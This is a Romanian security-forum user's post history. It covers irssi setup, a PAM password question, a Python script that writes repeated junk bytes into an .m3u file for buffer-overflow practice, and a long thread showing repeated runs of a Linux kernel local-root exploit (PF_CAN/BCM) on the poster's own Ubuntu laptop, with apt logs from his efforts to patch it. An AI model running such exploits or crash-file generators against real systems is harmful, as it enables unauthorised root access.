Flubber
-
Posts
1765 -
Joined
-
Last visited
-
Days Won
11
Posts posted by Flubber
-
-
Sunt cel mai ratat dintre ratati. Lasa-ma pe mine sa fiu cel mai ratat.
-
foarte destept... dar am o mica problema nu ma pot conecta la canal/server ... zice:
05:39 -!- Irssi: Looking up Free
05:40 -!- Irssi: Unable to connect server Free port 6667 [Host not found]
ai vreo idee de ce? am urmarit fiecare pas si am facut totul bine...
Incearca:
/server add -auto -network Free irc.freenode.net 6667Iti recomand mai intai sa arunci o privire pe aici: http://irssi.org/documentation/startup
//
Cu codurile care le-ai descris tu (pyth0n3) mi se conecteaza automat indata ce scriu "irssi" in terminal,de asemenea ca sa treceti de la canal la canal apasati "CTRL + P" si "CTRL + N"
Si de asemenea temele se pot edita:
nano /home/[I]user[/I]/.irssi/tema.themeCodurile folosite acolo le gasiti aici: Irssi - The client of the future
Aveti mare grija daca modificati, o sa fie bataie de cap pentru inceput (putina).
-
Nu mi-a functionat, am scris "123456789" (min = 10) si mi-a schimbat-o + ca este usoara! Nici nu m-a atentionat.
Config-ul:
# pam-auth-update to manage selection of other modules. See
# pam-auth-update(8) for details.
# here are the per-package modules (the "Primary" block)
password [success=1 default=ignore] pam_unix.so obscure retry=3 min=10 try_first_pass sha512
# here's the fallback if no module succeeds
password requisite pam_deny.so
# prime the stack with a positive return value if there isn't one already;
# this avoids us returning an error just because nothing sets a success code
# since the modules above will each just jump around
password required pam_permit.so
# and here are more per-package modules (the "Additional" block)
password optional pam_gnome_keyring.so
# end of pam-auth-update config
eval@eval-laptop:~$ passwd
Changing password for eval.
(current) UNIX password: # optiunea asta mi-a bagat-o
Enter new UNIX password: # aici am scris 123456789
Retype new UNIX password: # confirmat-o
passwd: [B]password updated successfully[/B] # <- TADAAAAM
eval@eval-laptop:~$Apropo, ai dat pam-auth-update config? Dupa ce am dat asta mi-au functionat anumite setari.
Edit: Am uitat sa specific ca rulez pe Ubuntu 10.04.1 LTS // Kernel: 2.6.32-25-generic
-
Foarte interesant, am sa mai astept sa vad ce feedback primeste si poate am sa migrez la asta. S-ar putea sa spun o prostie, dar va afecta cumva memoriile, cum se alocheaza ele si nu numai (stack, stack pointer, etc), o sa dea 'batai' de cap celor care scriu exploit-uri? Cum am spus, s-ar putea sa zic o prostie, luati-ma usor daca am gresit si vreti sa ma corectati. MILA! xD
-
OK, urmand tutorialul lui Peter Van Eeckhoutte, am dat de un mic punct de practica in care trebuia sa faci un script care sa scrie 10k "\x41" (fiind in hexadecimal insemnand "A") intr-un fisier ".m3u" care era "incarcat" (open file) de catre aplicatia vulnerabila. Dupa ce am incercat aseara sa imi imbunatatesc programelul si am esuat, azi intrand pe Linux mi-am propus sa incerc din nou, si asa au trecut ~4 ore pana am reusit sa il fac cum vreau eu si sa-i "dau de cap". Problema pe care o aveam, era ca, incercam sa iau input-ul user-ului de la optiuni (valoarea cunoscuta sub drept de argument) cu sys.argv[] (folosindu-ma de modulul "sys"), si aveam ceva de genul:
import sys
usage = """Usage:
-f numele fisierului
-j gunoi
-m de cate ori se va efectua multiplicarea (ex: de 10 ori => 10 * junk -- daca junk-ul este sa zicem \x41 rezulta in 10 de "A")"""
if len(sys.argv) < 4:
print "[-] Executare gresita."
print usage
def procesulmamei():
fisier = sys.argv[1]
gunoi = sys.argv[2]
multiplicare = sys.argv[3]
gm = str(gunoi) * int(multiplicare)
data = open(fisier, "w")
data.write(gm)
data.close()
print "OK."Ma rog, ceva de genul, scriptul l-am rescris aici, acum, din cauza ca l-am sters pe cel initial. Bineinteles, probabil am folosit sys.argv gresit (foarte probabil, 99,9%), DAR cineva mi-a recomandat "optparse".
Probleme pe care le-am intalnit scriind programul final:
- a durat ceva pana am invatat optparse, articole despre acest modul gasiti jos daca doriti sa-l invatati
- nu reuseam sa scriu hexadecimalul ca fiind caracter convertit in string (A), scria in fisier hexadecimalul (\x41 spre exemplu)
+ am gasit inca un modul foarte frumos: binascii pentru a convertii din hexadecimal in string
# Adaugare:
## INCEPUT
Am uitat sa mentionez ceva in legatura cu modulul optparse si anume, ca sa luati valoarea user-ului ce o introduce (input) si sa o stocati in variabila va veti folosii de (in cazul codului de mai jos) opts.variabila. De ce?
Avem:
[...]
Line #1: parser.add_option("-m", "--milf", help="mothers i like to.... felicitate", [B]dest="pr0n"[/B], type="string")
Line #2:
Line #3: (opts, args) = parser.parse_args()Ceea ce ne intereseaza este "dest" (destination). Destination creeaza o variabila pe care o definiti voi si acolo va stoca input-ul user-ului, este ceva de genul la:
kfc = raw_input("Ce iti place sa mananci? ")Variabila "kfc" va avea valoarea pe care voi o scrieti, sa zicem "Mc Donalds". Linia a 3-a ne foloseste pentru a stoca toate aceste "variabile" facute de catre parser (modul) intr-o lista (a nu se intelege lista: ['item1','item2'] ci tuple: ('item1','item2') care nu poate fi editata fata de lista). Aici putem folosii movies = opts.pr0n.
Valorile din opts ar arata asa (mai mult ca un dictionar): {pr0n: argument}. Daca user-ul da:
script.py -m SavannaSamsonIn acest moment "pr0n" din "opts" ar fii ceva de genul: {pr0n: SavannaSamson}, iar variabila "movies" ar avea ca valoare "SavannaSamson"
Nu stiu daca am explicat foarte bine si daca ati inteles mare lucru, s-ar putea sa fi gresit in legatura cum se stocheaza datele in variabile la optiunea "dest" din add_option, s-ar putea sa ma fi contrazis intr-un fel, iar daca da, rog pe cineva sa ma corecteze (chiar sunt curios cum este defapt, daca ma insel), dar sper ca v-a fost de ajutor.
## SFARSIT
In fine, per total am si invatat (module noi, program care poate fi apelat din command line - ex: terminal -, cum sa tratez anumite 'exceptii', etc.), dar a fost si bataie de cap si mult timp dedicat.
Codul:
#!/usr/bin/python
# Python version used to code this program: 2.6.5 on Ubuntu Linux 10.04.1 LTS
# Coded by Flubber on 04.09.2010 / 15:10
import sys
import binascii
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", help="filename (e.g.: milf.m3u -- default: music.m3u)", dest="filename", type="string", default="music.m3u")
parser.add_option("-j", "--junk", help="junk to write (e.g.: \\x41 -- default: \\x41)", dest="junk", type="string", default="\\x41")
parser.add_option("-m", "--multiply", help="times to multiply the junk (default: 10000)", dest="multiply", type="int", default="10000")
(opts, args) = parser.parse_args()
def process():
try:
filename = opts.filename
if filename.find(".m3u") == -1:
print "[*] Adjusting file name - adding extension \".m3u\" ... [OK]"
filename = filename + ".m3u"
else:
print "[+] Filename ... [OK]"
junk = opts.junk
if junk.find("\\") == -1:
print "[*] Adjusting junk data ... [OK]"
junk = "\\" + junk
else:
print "[+] Junk ... [OK]"
multiply = opts.multiply
junksecond = junk.replace("\\x", "")
somelittlestuff = binascii.unhexlify(junksecond)
littlestuff = str(somelittlestuff) * int(multiply)
data = open(filename, "w")
data.write(littlestuff)
data.close()
print """\n\n[+] Job completed successfully. Information:\n
[*] Filename: %s
[*] Junk: %s
[*] Times the junk was multiplied by: %s\n""" % (filename, junk, multiply)
except:
print "[-] Unexpected error:", sys.exc_info()[0]
raise
else:
print "[+] Exiting. Have a nice day!"
process()Codepad: Python code - 46 lines - codepad
Articole:
Python’s optparse for human beings de "Alex on linux"
"Tratarea" exceptiilor - documentatia oficiala Python
Despre modulul "optparse" - documentatia oficiala Python
Binascii - documentatia oficiala de pe site-ul Python.org
Revin mai tarziu cu completari.
Bafta, sper sa ajute pe cineva.
-
2
-
-
Foarte bun!
-
eval@eval-laptop:/tmp/exploit$ ./expl0it
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb7859000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[150] = 6750377
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit#
Mie mi-a mers.
uname -a
Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux
cat /etc/issue
Ubuntu 10.04 LTS \n \l
Deasemenea, poate sa-mi explice cineva mai exact cum functioneaza? Am inteles ideea... ce face el, dar in detaliu si usor de inteles. Cum identifica adresele de memorie in Kernel Symbol Table? Este foarte avansat (complex) din cate vad, nu ca as fi eu guru, din contra.
Later edit:
Ce este si mai ciudat asta:
apt-get update
Hit http://ftp.gts.lug.ro lucid Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid-updates Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid-security Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid Release
Hit http://ftp.gts.lug.ro lucid-updates Release
Hit http://ftp.gts.lug.ro lucid-security Release
Hit http://ftp.gts.lug.ro lucid/main Packages
Hit http://ftp.gts.lug.ro lucid/restricted Packages
Hit http://ftp.gts.lug.ro lucid/main Sources
Hit http://ftp.gts.lug.ro lucid/restricted Sources
Hit http://ftp.gts.lug.ro lucid/universe Packages
Hit http://ftp.gts.lug.ro lucid/universe Sources
Hit http://ftp.gts.lug.ro lucid/multiverse Packages
Hit http://ftp.gts.lug.ro lucid/multiverse Sources
Hit http://ftp.gts.lug.ro lucid-updates/main Packages
Hit http://ftp.gts.lug.ro lucid-updates/restricted Packages
Hit http://ftp.gts.lug.ro lucid-updates/main Sources
Hit http://ftp.gts.lug.ro lucid-updates/restricted Sources
Hit http://ftp.gts.lug.ro lucid-updates/universe Packages
Hit http://ftp.gts.lug.ro lucid-updates/universe Sources
Hit http://ftp.gts.lug.ro lucid-updates/multiverse Packages
Hit http://ftp.gts.lug.ro lucid-updates/multiverse Sources
Hit http://ftp.gts.lug.ro lucid-security/main Packages
Hit http://ftp.gts.lug.ro lucid-security/restricted Packages
Hit http://ftp.gts.lug.ro lucid-security/main Sources
Hit http://ftp.gts.lug.ro lucid-security/restricted Sources
Hit http://ftp.gts.lug.ro lucid-security/universe Packages
Hit http://ftp.gts.lug.ro lucid-security/universe Sources
Hit http://ftp.gts.lug.ro lucid-security/multiverse Packages
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://ftp.gts.lug.ro lucid-security/multiverse Sources
Hit http://archive.canonical.com lucid Release
Hit http://archive.canonical.com lucid/partner Packages
Hit http://archive.canonical.com lucid/partner Sources
Reading package lists... Done
Bineinteles ca din "Update manager" nu pot sa updatez nimic, imi spune ca sistemul meu a fost updatat acum o ora, dar inca este vulnerabil. Am incercat inca odata exploit-ul si tot merge, nu a fost deloc patch-uit. De ce imi ignora anumite surse din repository cum ar fii:
?Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US
Mortii si ranitii de situatie! Am scris ditamai update-ul la post spunand cum am reusit sa patchuiesc si cand am rulat iar exploit-ul cu patch-urile bagate mi-a inghetat totul. In fine, ideea era:
- am reusit sa rezolv problema selectand "Main server" din "Software Sources" apoi m-a atentionat ca lista este out-of-date (nu stiu ce lista, parca asa mi-a zis, probabil etc/apt/sources.list) si sa-i dau reload, ceea ce am si facut
- patch-urile au fost instalate printr-un "apt-get upgrade" ce a durat putin mai mult (nu i-am mai dat upgrade si update de foarte mult timp) rezultand in:
cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
# acum incerc iar exploit-ul revin cu edit sa nu imi inghete iar o.s.-ul
Edit (ce dracu?!):
eval@eval-laptop:/tmp/exploit$ ls
expl.c exploit
eval@eval-laptop:/tmp/exploit$ ./exploit
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb78d1000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[149] = 5603492
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/tmp/exploit# # WHAT THE FUCK?!
root@eval-laptop:/tmp/exploit#
?!
// Inca un apt-get upgrade:
eval@eval-laptop:/tmp/exploit$ sudo apt-get upgrade
[sudo] password for eval:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
linux-generic linux-headers-generic linux-image-generic
The following packages will be upgraded:
wget
1 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
Need to get 289kB of archives.
After this operation, 4,096B of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-security/main wget 1.12-1.1ubuntu2.1 [289kB]
Fetched 289kB in 0s (610kB/s)
(Reading database ... 149534 files and directories currently installed.)
Preparing to replace wget 1.12-1.1ubuntu2 (using .../wget_1.12-1.1ubuntu2.1_i386.deb) ...
Unpacking replacement wget ...
Processing triggers for install-info ...
Processing triggers for man-db ...
Setting up wget (1.12-1.1ubuntu2.1) ...
Haha, idiotul de mine, bineinteles ca exploit-ul inca mai merge! Eu l-am stins de la buton atunci cand a inghetat o.s.-ul asa ca nu si-a mai dat upgrade cum a trebuit.
Aparent 3 pachete nu au fost instalate (din punctul meu de vedere fiind critice -- ele nemaifiind instalate exploit-ul inca mai merge).
apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
linux-generic linux-headers-generic linux-image-generic
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
linux-generic:
The following NEW packages will be installed:
linux-image-2.6.32-24-generic
The following packages will be upgraded:
linux-generic linux-image-generic
2 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 31.5MB of archives.
After this operation, 99.0MB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-2.6.32-24-generic 2.6.32-24.42 [31.5MB]
Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-generic 2.6.32.24.25 [4,022B]
Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-generic 2.6.32.24.25 [4,032B]
Fetched 31.5MB in 14s (2,230kB/s)
Selecting previously deselected package linux-image-2.6.32-24-generic.
(Reading database ... 149534 files and directories currently installed.)
Unpacking linux-image-2.6.32-24-generic (from .../linux-image-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...
Done.
Preparing to replace linux-generic 2.6.32.23.24 (using .../linux-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-generic ...
Preparing to replace linux-image-generic 2.6.32.23.24 (using .../linux-image-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-image-generic ...
Setting up linux-image-2.6.32-24-generic (2.6.32-24.42) ...
Running depmod.
update-initramfs: Generating /boot/initrd.img-2.6.32-24-generic
Running postinst hook script /usr/sbin/update-grub.
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-2.6.32-24-generic
Found initrd image: /boot/initrd.img-2.6.32-24-generic
Found linux image: /boot/vmlinuz-2.6.32-23-generic
Found initrd image: /boot/initrd.img-2.6.32-23-generic
Found linux image: /boot/vmlinuz-2.6.32-21-generic
Found initrd image: /boot/initrd.img-2.6.32-21-generic
Found memtest86+ image: /boot/memtest86+.bin
Found |bla bla| on /dev/sda1
Found |bla bla| on /dev/sda2
done
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/postinst.d/pm-utils 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
Setting up linux-image-generic (2.6.32.24.25) ...
Setting up linux-generic (2.6.32.24.25) ...
linux-headers-generic:
The following extra packages will be installed:
linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic
The following NEW packages will be installed:
linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic
The following packages will be upgraded:
linux-headers-generic
1 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.
Need to get 10.6MB of archives.
After this operation, 85.3MB of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24 2.6.32-24.42 [9,879kB]
Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24-generic 2.6.32-24.42 [740kB]
Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-generic 2.6.32.24.25 [4,022B]
Fetched 10.6MB in 6s (1,578kB/s)
Selecting previously deselected package linux-headers-2.6.32-24.
(Reading database ... 153043 files and directories currently installed.)
Unpacking linux-headers-2.6.32-24 (from .../linux-headers-2.6.32-24_2.6.32-24.42_all.deb) ...
Selecting previously deselected package linux-headers-2.6.32-24-generic.
Unpacking linux-headers-2.6.32-24-generic (from .../linux-headers-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...
Preparing to replace linux-headers-generic 2.6.32.23.24 (using .../linux-headers-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-headers-generic ...
Setting up linux-headers-2.6.32-24 (2.6.32-24.42) ...
Setting up linux-headers-2.6.32-24-generic (2.6.32-24.42) ...
Examining /etc/kernel/header_postinst.d.
run-parts: executing /etc/kernel/header_postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/header_postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
Setting up linux-headers-generic (2.6.32.24.25) ...
Si un clean-up: apt-get autoremove
Acum exploit-ul incercat (pentru a n oara):
eval@eval-laptop:/tmp/exploit$ ls
evil_exploit expl.c
eval@eval-laptop:/tmp/exploit$ ./evil_exploit
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb779a000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[152] = 5636263
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit# uname -a
Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux
root@eval-laptop:/tmp/exploit# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/tmp/exploit#
Deci ceva este in neregula. Ce poate sa fie?
Pe langa asta am observat ca era port 631 @ TCP deschis (IPP), am rezolvat problema urmand pasii descrisi aici: http://ubuntuforums.org/showthread.php?t=337868 .
root@eval-laptop:/home/eval# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@eval-laptop:/home/eval# apt-get update
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://archive.ubuntu.com lucid Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-updates Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US
Hit http://archive.canonical.com lucid Release
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-security Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US
Hit http://archive.canonical.com lucid/partner Packages
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid Release
Hit http://archive.ubuntu.com lucid-updates Release
Hit http://archive.canonical.com lucid/partner Sources
Hit http://archive.ubuntu.com lucid-security Release
Hit http://archive.ubuntu.com lucid/main Packages
Hit http://archive.ubuntu.com lucid/restricted Packages
Hit http://archive.ubuntu.com lucid/main Sources
Hit http://archive.ubuntu.com lucid/restricted Sources
Hit http://archive.ubuntu.com lucid/universe Packages
Hit http://archive.ubuntu.com lucid/universe Sources
Hit http://archive.ubuntu.com lucid/multiverse Packages
Hit http://archive.ubuntu.com lucid/multiverse Sources
Hit http://archive.ubuntu.com lucid-updates/main Packages
Hit http://archive.ubuntu.com lucid-updates/restricted Packages
Hit http://archive.ubuntu.com lucid-updates/main Sources
Hit http://archive.ubuntu.com lucid-updates/restricted Sources
Hit http://archive.ubuntu.com lucid-updates/universe Packages
Hit http://archive.ubuntu.com lucid-updates/universe Sources
Hit http://archive.ubuntu.com lucid-updates/multiverse Packages
Hit http://archive.ubuntu.com lucid-updates/multiverse Sources
Hit http://archive.ubuntu.com lucid-security/main Packages
Hit http://archive.ubuntu.com lucid-security/restricted Packages
Hit http://archive.ubuntu.com lucid-security/main Sources
Hit http://archive.ubuntu.com lucid-security/restricted Sources
Hit http://archive.ubuntu.com lucid-security/universe Packages
Hit http://archive.ubuntu.com lucid-security/universe Sources
Hit http://archive.ubuntu.com lucid-security/multiverse Packages
Hit http://archive.ubuntu.com lucid-security/multiverse Sources
Reading package lists... Done
root@eval-laptop:/home/eval#
Mda, si acum imi mai ignora unele surse.
/etc/apt/sources.list:
# deb cdrom:[ubuntu 10.04 LTS _Lucid Lynx_ - Release i386 (20100429)]/ lucid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://archive.ubuntu.com/ubuntu lucid main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://archive.ubuntu.com/ubuntu lucid-updates main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team. Also, please note that software in universe WILL NOT receive any
## review or updates from the Ubuntu security team.
deb http://archive.ubuntu.com/ubuntu lucid universe
deb-src http://archive.ubuntu.com/ubuntu lucid universe
deb http://archive.ubuntu.com/ubuntu lucid-updates universe
deb-src http://archive.ubuntu.com/ubuntu lucid-updates universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://archive.ubuntu.com/ubuntu lucid multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid multiverse
deb http://archive.ubuntu.com/ubuntu lucid-updates multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid-updates multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse
# deb-src http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse
## Uncomment the following two lines to add software from Canonical's
## 'partner' repository.
## This software is not part of Ubuntu, but is offered by Canonical and the
## respective vendors as a service to Ubuntu users.
deb http://archive.canonical.com/ubuntu lucid partner
deb-src http://archive.canonical.com/ubuntu lucid partner
deb http://archive.ubuntu.com/ubuntu lucid-security main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid-security main restricted
deb http://archive.ubuntu.com/ubuntu lucid-security universe
deb-src http://archive.ubuntu.com/ubuntu lucid-security universe
deb http://archive.ubuntu.com/ubuntu lucid-security multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid-security multiverse
Nu inteleg unde este problema.
Dist-upgrade:
apt-get dist-upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
OK, sper ca asta este ultimul edit, m-am cam saturat deja si mi-a dat cateva batai de cap, trebuia sa mai bifez ceva in "Software Sources" si anume "Pre-released updates":
Intr-un final dupa un restart (fortat):
root@eval-laptop:/home/eval# apt-get update
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://archive.ubuntu.com lucid Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US
Hit http://archive.canonical.com lucid Release
Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-updates Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-security Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-proposed Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/multiverse Translation-en_US
Hit http://archive.canonical.com lucid/partner Packages
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/universe Translation-en_US
Hit http://archive.ubuntu.com lucid Release
Hit http://archive.ubuntu.com lucid-updates Release
Hit http://archive.canonical.com lucid/partner Sources
Hit http://archive.ubuntu.com lucid-security Release
Hit http://archive.ubuntu.com lucid-proposed Release
Hit http://archive.ubuntu.com lucid/main Packages
Hit http://archive.ubuntu.com lucid/restricted Packages
Hit http://archive.ubuntu.com lucid/main Sources
Hit http://archive.ubuntu.com lucid/restricted Sources
Hit http://archive.ubuntu.com lucid/universe Packages
Hit http://archive.ubuntu.com lucid/universe Sources
Hit http://archive.ubuntu.com lucid/multiverse Packages
Hit http://archive.ubuntu.com lucid/multiverse Sources
Hit http://archive.ubuntu.com lucid-updates/main Packages
Hit http://archive.ubuntu.com lucid-updates/restricted Packages
Hit http://archive.ubuntu.com lucid-updates/main Sources
Hit http://archive.ubuntu.com lucid-updates/restricted Sources
Hit http://archive.ubuntu.com lucid-updates/universe Packages
Hit http://archive.ubuntu.com lucid-updates/universe Sources
